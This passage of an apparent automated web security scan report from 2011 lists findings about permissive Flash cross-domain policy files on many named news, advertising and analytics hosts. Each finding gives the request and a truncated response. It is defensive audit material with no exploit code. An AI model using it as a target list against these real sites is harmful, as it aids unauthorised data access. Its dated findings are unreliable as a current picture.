ETag: "a27e344a618640558cd334164e432db0:1247617934"
Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Date: Wed, 07 Sep 2011 14:18:54 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.18. http://feed.video.news.com.au/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.video.news.com.au
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: feed.video.news.com.au

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Content-Length: 325
Last-Modified: Thu, 04 Aug 2011 11:13:54 GMT
Server: Jetty(6.1.19)
Date: Wed, 07 Sep 2011 14:14:53 GMT
Connection: close

<?xml version="1.0"?>

<!-- used for controlling cross-domain data loading in Macromedia Flash -->
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" />
   <allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.19. http://feeds.news.com.au/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://feeds.news.com.au
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: feeds.news.com.au
Proxy-Connection: keep-alive
Referer: http://media.perthnow.com.au/ipad/300x250_GetMore_Swipe_RSS_Feed_PerthNow.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "ff684cff42d8e750dc963b501946080a:1214175420"
Last-Modified: Sun, 22 Jun 2008 22:57:00 GMT
Accept-Ranges: bytes
Content-Length: 275
Content-Type: application/xml
Date: Wed, 07 Sep 2011 14:14:54 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="ma
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.20. http://g-pixel.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://g-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: g-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Wed, 07 Sep 2011 14:14:19 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

3.21. http://g.ca.bid.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://g.ca.bid.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: g.ca.bid.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Wed, 07 Sep 2011 14:14:14 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

3.22. http://hpi.rotator.hadj7.adjuggler.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: hpi.rotator.hadj7.adjuggler.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"340-1315378660000"
Last-Modified: Wed, 07 Sep 2011 06:57:40 GMT
Content-Type: application/xml
Content-Length: 340
Date: Wed, 07 Sep 2011 14:14:18 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies=
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.23. http://i.w55c.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: i.w55c.net

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:17 GMT
Server: Jetty(6.1.22)
Cache-Control: max-age=86400
Content-Length: 488
content-type: application/xml
Via: 1.1 bfi061002 (MII-APC/2.1)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

   <allow-access-from domain="*" to-ports="*"/>
   <site-control
...[SNIP]...

3.24. http://ib.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 08-Sep-2011 14:14:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=-1; path=/; expires=Tue, 06-Sep-2016 14:14:12 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

3.25. http://img-cdn.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://img-cdn.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img-cdn.mediaplex.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Content-Type: text/x-cross-domain-policy
Date: Wed, 07 Sep 2011 14:14:24 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.26. http://img.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:19 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.27. http://js.revsci.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Wed, 07 Sep 2011 14:14:28 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.28. http://l.yimg.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://l.yimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: l.yimg.com

Response

HTTP/1.0 200 OK
Date: Wed, 07 Sep 2011 01:13:30 GMT
Cache-Control: max-age=315360000
Expires: Sat, 04 Sep 2021 01:13:30 GMT
Last-Modified: Mon, 01 Feb 2010 17:51:54 GMT
Accept-Ranges: bytes
Content-Length: 408
Vary: Accept-Encoding
Content-Type: application/xml
Age: 46926
Server: YTS/1.19.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xs
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

3.29. http://m.xp1.ru4.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 07 Sep 2011 14:14:14 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:32:05 GMT
Content-length: 202
Etag: "ca-4ceae155"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

3.30. http://map.media6degrees.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://map.media6degrees.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: map.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Wed, 07 Sep 2011 14:14:29 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.31. http://ndm.feeds.theplatform.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ndm.feeds.theplatform.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ndm.feeds.theplatform.com

Response

HTTP/1.0 200 OK
ETag: W/"187-1206468920250"
Last-Modified: Tue, 25 Mar 2008 18:15:20 GMT
Content-Type: text/xml
Content-Length: 187
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Date: Wed, 07 Sep 2011 14:14:46 GMT
X-Cache: HIT from feeds.theplatform.com
Via: 1.0 sea1squid01 (squid/3.0.STABLE23)
Connection: close

<?xml version="1.0"?>

<!-- used for controlling cross-domain data loading in Macromedia Flash -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>


3.32. http://pix04.revsci.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Wed, 07 Sep 2011 14:14:28 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.33. http://pixel.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Wed, 07 Sep 2011 14:14:20 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

3.34. http://pixel.quantserve.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Thu, 08 Sep 2011 14:14:09 GMT
Content-Type: text/xml
Content-Length: 207
Date: Wed, 07 Sep 2011 14:14:09 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

3.35. http://pt200194.unica.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pt200194.unica.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pt200194.unica.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 28 Jul 2010 19:24:08 GMT
ETag: "60471-107-48c778fc6a600"
Accept-Ranges: bytes
Content-Length: 263
P3P: CP="NOI DSP COR PSA ADMa DEVa OUR IND OTC"
Content-Type: text/xml
Expires: Wed, 07 Sep 2011 14:14:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 07 Sep 2011 14:14:36 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.36. http://s0.2mdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Tue, 06 Sep 2011 18:56:30 GMT
Expires: Wed, 07 Sep 2011 18:56:30 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 69528

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.37. http://s1.2mdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s1.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s1.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Tue, 06 Sep 2011 18:57:19 GMT
Expires: Wed, 07 Sep 2011 18:57:19 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 69487

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.38. http://secure-au.imrworldwide.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-au.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-au.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:32 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Wed, 14 Sep 2011 14:14:32 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

3.39. http://statse.webtrendslive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: statse.webtrendslive.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:6eb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 14:14:15 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

3.40. http://sync.mathtag.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x3 pid 0xc95 3221
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

3.41. http://tags.bluekai.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Wed, 07 Sep 2011 14:14:26 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Jun 2011 21:44:06 GMT
ETag: "6803d3-ca-4a6e0af03f580"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

3.42. http://www.7perth.com.au/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.7perth.com.au
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.7perth.com.au

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Wed, 07 Sep 2011 14:14:19 GMT
ETag: "2246f-64-4aa4f0e5de917"
Last-Modified: Fri, 12 Aug 2011 13:40:27 GMT
Server: Apache/2.2.16 (Amazon)
Content-Length: 100
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

3.43. http://www.abc.net.au/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.abc.net.au

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 31 Aug 2011 06:56:20 GMT
ETag: "16037c5-842-a01ded00"
Content-Type: text/xml
Expires: Wed, 07 Sep 2011 14:14:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 07 Sep 2011 14:14:12 GMT
Content-Length: 2114
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.abc.net.au" />
...[SNIP]...
<allow-access-from domain="abc.net.au" />
   <allow-access-from domain="*.usmob.com.au"/>
   <allow-access-from domain="usmob.com.au"/>
   <allow-access-from domain="rollermache.net" />
   <allow-access-from domain="www.rollermache.net" />
   <allow-access-from domain="www.abctv.net.au" />
   <allow-access-from domain="*.radioaustralia.net.au" />
   <allow-access-from domain="*.bayvut.com" />
   <allow-access-from domain="radioaustralia.net.au" />
   <allow-access-from domain="bayvut.com" />
   <allow-access-from domain="www.radioaustralia.net.au" />
   <allow-access-from domain="www.bayvut.com" />
   <allow-access-from domain="serve.a-feed.com" />
   <allow-access-from domain="220.233.4.205" />
   <allow-access-from domain="*.220.233.4.205" />
   <allow-access-from domain="www.gruen2.thefeds.com.au" />
   <allow-access-from domain="gruen2.thefeds.com.au" />
   <allow-access-from domain="wildspace.tv" />
   <allow-access-from domain="wildspace.thefeds.com.au" />
   <allow-access-from domain="*" />
   <allow-access-from domain=" moteldeception.thefeds.com.au "/>
   <allow-access-from domain="australianetwork.com" />
   <allow-access-from domain="www.australianetwork.com" />
   <allow-access-from domain="*.australianetwork.com" />
   <allow-access-from domain="australianetworkblogs.com" />
   <allow-access-from domain="*.australianetworkblogs.com" />
   <allow-access-from domain="*.sportsflash.com.au" />
   <allow-access-from domain="*.cadability.com.au" />    
   <allow-access-from domain="*.abceducation.net.au" />
   <allow-access-from domain="pluck.abc.net.au" />
   <allow-access-from domain="pluck2.abc.net.au" />
   <allow-access-from domain="pluckstage.abc.net.au" />
   <allow-access-from domain="pluck2stage.abc.net.au" />
...[SNIP]...

3.44. http://www.weatherchannel.com.au/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weatherchannel.com.au
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.weatherchannel.com.au

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: text/xml
Date: Wed, 07 Sep 2011 14:14:55 GMT
ETag: "315d9e4f6c82ca1:0"
Connection: close
Last-Modified: Mon, 21 Dec 2009 18:35:03 GMT
X-Powered-By: ASP.NET
X-Cache-Info: caching
Content-Length: 109

...<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.45. http://yql.yahooapis.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://yql.yahooapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: yql.yahooapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Date: Wed, 07 Sep 2011 14:18:18 GMT
Server: YTS/1.19.8
Age: 0

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-policy>

3.46. http://adadvisor.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adadvisor.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adadvisor.net

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:51 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 478
